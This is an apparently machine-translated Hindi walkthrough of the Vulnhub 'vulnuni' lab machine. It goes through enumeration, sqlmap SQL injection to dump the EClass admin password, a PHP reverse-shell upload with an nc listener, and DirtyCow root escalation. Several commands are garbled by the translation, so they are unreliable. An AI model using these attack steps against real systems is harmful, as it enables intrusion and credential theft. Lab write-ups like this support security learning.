मेटाप्लोइट के बिना 1 वल्हनुब वॉकथ्रू

मैं तब खड़ा नहीं हो सकता जब तक मेटासैप्लोइट के बिना वल्कनब वॉकथ्रू न हो! तो मैं इस कारण के लिए Metasploit के बिना 1 vulnhub walkthrough: इस vulnuni बनाया

Vulnhub vulnuni मशीन एक कमजोर लिनक्स मशीन है जो लिनक्स विशेषाधिकार वृद्धि, लिनक्स एन्यूमरेशन, वेब ऐप पेन टेस्टिंग, वेब ऐप हैकिंग, लिनक्स कर्नेल संस्करण को खोजने के लिए और बहुत कुछ सीखने के लिए अच्छा है!

टोह

nmap स्कैन दिखाता है कि एक वेब सेवा चल रही है।

मैं देख सकता था कि क्या कोई शोषण है, जो यह कहना है कि क्या अपाचे के इस संस्करण में भेद्यता है। लेकिन, यहां वेबसाइट देखने और पहले खुद को देखने के लिए बेहतर है।

पहला कदम हालांकि है / etc / मेजबान / फ़ाइल में vulnuni.local जोड़ें, कोई भी व्यक्ति जो फ्रीक्वेंसी बॉक्स को हैक करता है या बहुत सारी वल्ननबस मशीन करता है, वह जानता है कि यह मानक अभ्यास है।

वेब एन्यूमरेशन

वेब एन्यूमरेशन चरण शुरू करने के लिए, मैं AutoRecon, dirsearch, या dirb का उपयोग करता हूं। Dirsearch को कुछ भी नहीं मिला, इसलिए dirb अगला था। डिर्ब को कुछ अतिरिक्त पृष्ठ मिले जो दिलचस्प लगते हैं।

मैंने वेब सेवा के नाम और संस्करण संख्या को देखने के लिए पृष्ठ स्रोत को देखा और उसके बारे में शुरू करने वाले प्रत्येक पृष्ठ को देखा।

एक dirb खोज करें dirb http: //vulnuni.local

vulnhub vulnuni वॉकथ्रू dirb खोज

पृष्ठ स्रोत देखने से एक टिप्पणी दिखाई देती है जिससे पता चलता है कि यह क्लास प्लेटफ़ॉर्म है। यह जानकारी स्वयं एक शोषण खोजने के लिए पर्याप्त है, जैसा कि मुझे पता चला है, लेकिन नए पृष्ठ को देखने से इसे कम करने में मदद मिलती है।

Http: //vulnuni.local/courses देखें

ब्राउज़र में उस HTML फ़ाइल में नेविगेट करने से “EClass प्लेटफ़ॉर्म” पृष्ठ आता है और इसके साथ एक लॉगिन बटन, अच्छा है!

लॉगइन पेज पर जाएं vulnuni.local / vulnuni-eclass / आगे।

यह हमेशा एक वेब ऐप के लिए डिफ़ॉल्ट क्रेडेंशियल्स की कोशिश करने के लायक है, इसलिए मैं व्यवस्थापक: व्यवस्थापक और व्यवस्थापक: qwerty का प्रयास करता हूं लेकिन ये काम नहीं करेंगे।

पहला शोषण

चूंकि मैं ऑनलाइन उपलब्ध कारनामों को देखने के लिए EClass वेब एप्लिकेशन पर लॉगइन नहीं कर सकता। पहले शोषण के लिए BurpSuite का उपयोग करने की आवश्यकता होती है और इसके लिए एक व्यवस्थापक खाते की भी आवश्यकता होती है।

शोषण 1.7.3 के संस्करण के बराबर या उससे कम के संस्करणों के लिए काम करता है, जो कि यह ऐप अच्छा है।

इस पहले कारनामे के लिए BurpSuite का उपयोग करना आवश्यक है। (फॉक्सपॉक्सी और बर्प का उपयोग करना चाहते हैं? मैंने ट्यूटोरियल लिखा है!) परीक्षण क्रेडेंशियल्स के साथ लॉगिन करें और बर्प में भेजे गए अनुरोध पर कब्जा करें।

इस कारनामे का अगला भाग लॉगिन पेज vulnuni.local / vulnuni-eclass से लॉगिन अनुरोध को कैप्चर करना और इसे फ़ाइल में सहेजना है। आप इसका उपयोग करके कर सकते हैं फ़ाइल की प्रतिलिपि> eclasslogintest के रूप में सहेजें और अनुरोध को sqlmap में लोड करें।

याद रखें हम अनुरोध चाहते हैं और प्रतिक्रिया नहीं।

अब sqlmap के लिए। शोषण के अनुसार आदेश का उपयोग करके sqlmap में अनुरोध को लोड करने का तरीका है साइक्लाम्प-आर एक्लास्जोलिंटेस्टेस्ट -वेल = ५-क्रिस = ३-वी

चलाने के लिए अगले आदेश हैं स्क्वैल्मैप-आर एक्लास्लेग्लिन्टेस्ट -v-current-db तथा sqlmap -r eclasslogintest -v -D eclass -T यूजर -C पासवर्ड -dump

दूसरा शोषण

दूसरे कारनामे के लिए एक व्यवस्थापक खाते की आवश्यकता होती है जो अब हमारे पास है! इसलिए क्रेडेंशियल के साथ फिर से लॉगिन पेज पर जाएं व्यवस्थापक: ilikecats89

इन दो कारनामों में अंतर यह है कि यह एक मेरे साथ लक्ष्य पर एक खोल पाने के साथ समाप्त हो जाएगा।

इस कारनामे को पूरा करने के लिए weushell को /usr/share/webshells/php-reverse-shell.php से / home / पर कॉपी करें और अपने वर्तमान नेटवर्किंग सेटिंग्स को प्रतिबिंबित करने के लिए शेल संपादित करें। सुनने के बंदरगाह को 443 पर सेट करें। अब php फाइल को जिप फॉर्मेट में कंप्रेस करें।

अब शोषण संपीडित शेल को एक vulnuni.local / vulnuni-eclass / मॉड्यूल / course_info / restore_course.php पर अपलोड करने के लिए कहता है।

संपीड़ित शेल को एक vulnuni.local / vulnuni-eclass / मॉड्यूल / course_info / Restore_course.php पर अपलोड करें।

अगला nc -lvp 443 के साथ एक nectat श्रोता शुरू करें। अन्य पोर्ट मेरे लिए काम नहीं करते थे, 4444 ने काम नहीं किया!

URL को vulnuni.local / vulnuni-eclass / पाठ्यक्रमों / tmpUnzipping / php-rev-shell.php पर कॉल करें

शेल को निष्पादित करने के लिए हमें पृष्ठ को फिर से लोड करना होगा। URL को vulnuni.local / vulnuni-eclass / पाठ्यक्रम / tmpUnzipping / php-rev-shell.php पर खोजें और एक शेल की प्रतीक्षा करें।

बैश शेल के साथ सबसे पहले एक बेहतर शेल प्राप्त करना है। ट्टी मॉड्यूल (टेलेटाइप्रिटर) का उपयोग करके ऐसा करें अजगर -y p आयात पीटी; पीटी.स्पॉन (“/ बिन / बाश”) “

अब जब मेरे पास विशेषाधिकार वृद्धि के चरण के लिए समय है। मैं पहले उपयोगकर्ता का झंडा ढूंढता हूं, जो कि www-data उपयोगकर्ता की होम निर्देशिका में flag.txt के रूप में पाया जाता है।

का उपयोग करते हुए बेमिसाल -स्मृति -s कर्नेल नाम / -r कर्नेल रिलीज / -m मशीन नाम) कमांड मैं देखता हूं कि लिनक्स कर्नेल संस्करण 3.11.0-15-जेनेरिक है इसलिए मैं डर्टी कॉव शोषण का उपयोग करने का प्रयास करूंगा।

सुविधा वृद्धि

किसी ने कहीं जा रहा है कि मैं के बारे में कहने के लिए उपयोग कर रहा हूँ DirtyCow, लेकिन यह है कि vulnuni रूट करने का इरादा तरीका। इस vulnhub vulnuni वॉकथ्रू में मैं DirtyCow का उपयोग करने के लिए कहता हूं।

DirtyCow अस्थिर हो सकता है, कुछ शोषण दस्तावेज वास्तव में कहता है। मुझे वास्तव में प्रयोग करने योग्य रूट शेल, कोई मजाक नहीं करने के लिए डर्टीकोव शोषण का संकलन करना पड़ा।

अजगर -m SimpleHTTPServer 8000 का उपयोग करके एक साधारण पायथन वेब सर्वर शुरू करें और डर्टी कॉव शोषण सी फ़ाइल की सेवा करें।

मैं मूल C संकलक gcc के साथ शोषण कोड संकलित करता हूं और शोषण निर्देशों के अनुसार इसे संकलित करता हूं। कमांड का उपयोग करें gcc 40616.c -o गाय जड़ -प्राथमिक

फिर मैं रूट-स्तरीय शेल प्राप्त करने के लिए शोषण को अंजाम देता हूं और ध्वज को पकड़ना जारी रखता हूं!

एक स्थिर शेल के लिए इको 0> / proc / sys / vm / dirty_writeback_centisecs का उपयोग करें।

कमांड का उपयोग करके, “इको 0> / proc / sys / vm / dirty_writeback_centisecs” सही है शोषण के बाद मैंने समग्र शेल स्थिरता में अपग्रेड देखा।

यह वल्हानु वल्नुनी के लिए है: 1 वॉकथ्रू।